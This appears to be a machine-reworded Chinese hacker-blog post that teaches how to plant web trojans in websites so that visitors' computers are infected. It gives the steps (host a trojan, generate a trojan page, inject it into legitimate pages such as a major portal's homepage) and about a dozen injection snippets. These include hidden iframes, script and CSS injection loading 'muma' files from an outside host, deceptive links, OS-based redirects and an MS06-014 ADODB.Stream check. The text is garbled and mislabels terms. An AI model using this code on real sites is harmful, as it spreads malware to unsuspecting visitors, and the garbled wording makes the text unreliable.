镜像劫持、网马详细介绍

hacker4年前 (2020-06-02)黑客文章731

今日，有一位网民问了我一个难题，他自己早已拥有网址了，如今他想制成“镜像劫持”这类网址，要是开启它，电脑上就会有将会感柒木马程序。

木马病毒是必须开启才有实际效果的，开启标准：要不蒙骗客户积极，要不运用系统漏洞。将会他对木马病毒、镜像劫持、网马这种并不是很了解，因而我刻意发过此一篇文章。

一、镜像劫持、网马详细介绍

1、镜像劫持

从“镜像劫持”这个词中就了解，它和“木马病毒”摆脱不上关联，确实，镜像劫持的目地便是将木马病毒散播出来。

黑客攻击了一些网址以后，将自身编定的网页木马置入到其网址的网页页面（一般是在网址首页）中，运用该网址的总流量将自身的网页木马散播出来进而做到自身的目地。

2、网马

网马，即“网页木马”，便是将木马病毒和网页页面融合在一起，当打开网站的情况下便会自动下载并运作其恶意代码。

二、网页木马运作基本原理

最开始的网页木马便是运用了IE电脑浏览器的ActiveX控制，在运作网页木马的情况下会弹出来一个控件下载提醒，仅有历经客户确定后才会运作在其中的木马病毒。

现阶段新式的木马病毒一般运用IE电脑浏览器存有的系统漏洞来散播网页木马。

自然，如今电脑浏览器不仅就是指IE，也有许多其他的电脑浏览器，比如：Google、百度搜索、360、搜狗搜索、 *** 、火狐浏览器......这些。

三、网页页面镜像劫持流程

1、申请办理服务器空间：将恶意代码和网马所有上传入该服务器空间，使其能够被浏览，倘若申请办理取得成功后的服务器空间详细地址为“http://www.xxx.com/xxx”；

2、提交恶意代码：提交进行后木马病毒的浏览详细地址为“http://www.xxx.com/horse.exe”；

3、应用网页页面木马生成器转化成网马：倘若转化成后网马详细地址为“http://www.xxx.com/horse.htm”；

4、开展镜像劫持：将转化成后的网马详细地址置入到别的一切正常的网页页面，倘若置入到腾迅的首页“http://www.qq.com/index.htm”；

四、网页页面镜像劫持的完成 ***

1、架构镜像劫持

<iframe src=详细地址 width=0 height=0></iframe>

2、 *** 文档镜像劫持

更先将下列编码：

document.write("<iframe width='0' height='0' src='详细地址'></iframe>");

储存为xxx.js。

则 *** 镜像劫持编码为：

<script language=javascript src=xxx.js></script>

3、 *** 形变数据加密

<SCRIPT language=" *** cript.Encode" src=https://www.fujieace.com/muma.txt></script>

muma.txt可改为随意后缀名；

4、body镜像劫持

<body onload="window.location='详细地址';"></body>

5、隐敝镜像劫持

top.document.body.innerHTML = top.document.body.innerHTML   '\r\n<iframe src="https://www.fujieace.com/muma.htm/"></iframe>';

6、css镜像劫持

body {
background-image: url('javascript:document.write("<script src=https://www.fujieace.com/muma.js></script>")')}

7、JAJA镜像劫持

<SCRIPT language=javascript>
window.open ("详细地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

8、照片掩藏

<html>
<iframe src="网马详细地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

9、掩藏启用

<frameset rows="444,0" cols="*">
<frame src="打开网站" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马详细地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

10、高級蒙骗

<a href="http://www.163.com(蒙蔽联接详细地址，显示信息这一详细地址偏向木马病毒详细地址)" onMouseOver="www_163_com(); return true;"> 网页页面要显示信息的內容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马详细地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

11、分辨系统软件编码

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>404</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<META content="MSHTML 6.00.2900.2769" name=GENERATOR></HEAD>
<BODY>
<SCRIPT language=javascript>
window.status="";
if(navigator.userAgent.indexOf("Windows NT 5.1") != -1)
window.location.href="tk.htm";
else
window.location.href="upx06014.htm";
</SCRIPT>
</BODY></HTML>

12、分辨是不是有ms06014编码

<script language=VBScript>
on error resume next
set server = document.createElement("object")
server.setAttribute "classid", "clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E"
set File = server.createobject(Adodb.Stream,"")
if Not Err.Number = 0 then
err.clear
document.write ("<iframe src=https://www.fujieace.com width=100% height=100% scrolling=no frameborder=0>")
else
document.write ("<iframe src=https://www.fujieace.com width=100% height=100% scrolling=no frameborder=0>")
end if
</script>

13、智能化载入js的编码demo

//读娶src的目标
var v = document.getElementById("advjs");
//读娶src的主要参数
var u_num = getUrlParameterAdv("showmatrix_num",v.getAttribute('src'));
document.write("<iframe src=\"https://www.fujieace.com/1/" u_num ".htm\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>");
document.writeln("<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.0 Transitional\/\/EN\">");
document.writeln("<HTML><HEAD>");
document.writeln("<META http-equiv=Content-Type content=\"text\/html; charset=big5\">");
document.writeln("<META content=\"MSHTML 6.00.2900.3059\" name=GENERATOR><\/HEAD>");
document.writeln("<BODY> ");
document.writeln("<DIV style=\"CURSOR: url(\'https:\/\/www.fujieace.com\/demo.js\')\">");
document.writeln("<DIV ");
document.writeln("style=\"CURSOR: url(\'https:\/\/www.fujieace.com\/demo.js\')\"><\/DIV><\/DIV><\/BODY><\/HTML>")
//剖析src的主要参数涵数
function getUrlParameterAdv(asName,lsURL){
loU = lsURL.split("?");
if (loU.length>1){
var loallPm = loU[1].split("&");
for (var i=0; i<loallPm.length; i  ){
var loPm = loallPm.split("=");
if (loPm[0]==asName){
if (loPm.length>1){
return loPm[1];
}else{
return "";
}
}
}
}
return null;

标签: 黑客技术

返回列表

上一篇：GDB或GNUProject程序调试

下一篇：黑客是怎么找网站的,点开了黑客网站

NetStumbler应用比别的专用工具更积极主动的方式

什么叫NetStumbler？ Netstumbler是用以搜索敞开式无线接入点的著名Windows专用工具之一。她们还派发了为PDA建立的WinCE版本号，并将其取名为MiniStumbler。N...

妻子出走丈夫找“黑客”定位

昨天13：42，新浪网友@翠苑派出所发微博：新晋奶爸报案，为了帮嗷嗷待哺的孩子找妈妈，他想尽办法，最后竟求助于网上的陌生人。陌生人称可以通过全球定位的网站找到妈妈，需要的只是妈妈的手机号和800...

网络黑客们最常见哪几种漏洞扫描工具?

我已经写过许多网络黑客方法了，假如你认真学，也可以把握一些了。可是有的新手便会问了，我怎样发觉网址有了你常说的系统漏洞，我怎样应用这种方法？这一就需要采用扫描枪了。扫描枪是一类自动识...

中国蚁剑是一款开源系统的混合开发网址可视化工具,它关键朝向于

中国蚁剑是一款开源系统的混合开发网址可视化工具，它关键朝向于合理合法受权的网站渗透测试安全性工作人员及其开展基本实际操作的系统管理员。通俗化的讲：中国蚁剑是一款比水果刀还牛的sh...

Ettercap是不是完全免费?

什么叫Ettercap？ Ettercap是一种对外开放源码网络信息安全专用工具，适用中间人攻击局域网络的工作人员。它根据ARP中毒了计算机软件并将网线端口放置掺杂方式。因而，它能够释放出来对其受...

专用工具完全免费使用方法

什么叫Sguil？以tcl / tk撰写的Sguil是为网络信息安全投资分析师搭建的。该专用工具的关键部件是形象化的GUI，能够浏览对话数据信息，即时恶性事件和初始数据文件捕捉。它也有利于执行量...

找黑客平台